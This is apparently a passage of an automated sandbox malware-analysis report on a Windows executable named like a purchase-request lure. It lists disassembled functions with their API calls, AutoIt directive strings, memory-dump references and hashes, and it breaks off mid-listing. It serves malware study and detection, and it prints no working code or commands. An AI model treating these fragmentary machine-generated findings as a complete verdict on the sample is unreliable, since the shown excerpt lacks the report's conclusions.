                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 2326526234-1173974218
                                                        • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                        • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                        • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                        • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                        Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                        • _wcslen.LIBCMT ref: 004335F2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                        • GetLastError.KERNEL32 ref: 0043362B
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                        • _wcsrchr.LIBCMT ref: 00433666
                                                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                        • String ID: \
                                                        • API String ID: 321622961-2967466578
                                                        • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                        • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                        • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                        • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                        Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                        • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                        • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                        • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                        Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                        • __lock.LIBCMT ref: 00417981
                                                          • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                          • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                          • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                        • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                        • __lock.LIBCMT ref: 004179A2
                                                        • ___addlocaleref.LIBCMT ref: 004179C0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                        • String ID: KERNEL32.DLL$pI
                                                        • API String ID: 637971194-197072765
                                                        • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                        • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                        • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                        • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                        Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_malloc
                                                        • String ID:
                                                        • API String ID: 1938898002-0
                                                        • Opcode ID: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                                                        • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                        • Opcode Fuzzy Hash: d043fc78578686455e84cdb9b2e40380f0db7399645aa8fde2fdf5317b917d0c
                                                        • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                        Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                        • _memmove.LIBCMT ref: 0044B555
                                                        • _memmove.LIBCMT ref: 0044B578
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                        • String ID:
                                                        • API String ID: 2737351978-0
                                                        • Opcode ID: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                                                        • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                        • Opcode Fuzzy Hash: 773decce50c93e3f36a11239f8f172856a87eb87626e5f0a1a8c5d5fb2b898c5
                                                        • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                        Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                        • __calloc_crt.LIBCMT ref: 00415246
                                                        • __getptd.LIBCMT ref: 00415253
                                                        • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                        • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                        • _free.LIBCMT ref: 0041529E
                                                        • __dosmaperr.LIBCMT ref: 004152A9
                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                        • String ID:
                                                        • API String ID: 3638380555-0
                                                        • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                        • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                        • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                        • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                        Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$Copy$ClearErrorInitLast
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 3207048006-625585964
                                                        • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                        • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                        • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                        • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                        Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                        • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                        • gethostbyname.WSOCK32(?), ref: 004655A6
                                                        • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                        • _memmove.LIBCMT ref: 004656CA
                                                        • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                        • WSACleanup.WSOCK32 ref: 00465762
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                        • String ID:
                                                        • API String ID: 2945290962-0
                                                        • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                        • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                        • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                        • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                        Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                        • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                        • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                        • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                        • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                        • String ID:
                                                        • API String ID: 1457242333-0
                                                        • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                        • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                        • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                        • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                        Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                        • String ID:
                                                        • API String ID: 15295421-0
                                                        • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                        • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                        • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                        • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                        Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • _wcstok.LIBCMT ref: 004675B2
                                                          • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                        • _wcscpy.LIBCMT ref: 00467641
                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                        • _wcslen.LIBCMT ref: 00467793
                                                        • _wcslen.LIBCMT ref: 004677BD
                                                          • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                        • String ID: X
                                                        • API String ID: 780548581-3081909835
                                                        • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                        • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                        • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                        • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                        Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                        • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                        • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                        • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                        • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                        • CloseFigure.GDI32(?), ref: 0044751F
                                                        • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                        • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                        • String ID:
                                                        • API String ID: 4082120231-0
                                                        • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                        • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                        • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                        • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                        Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
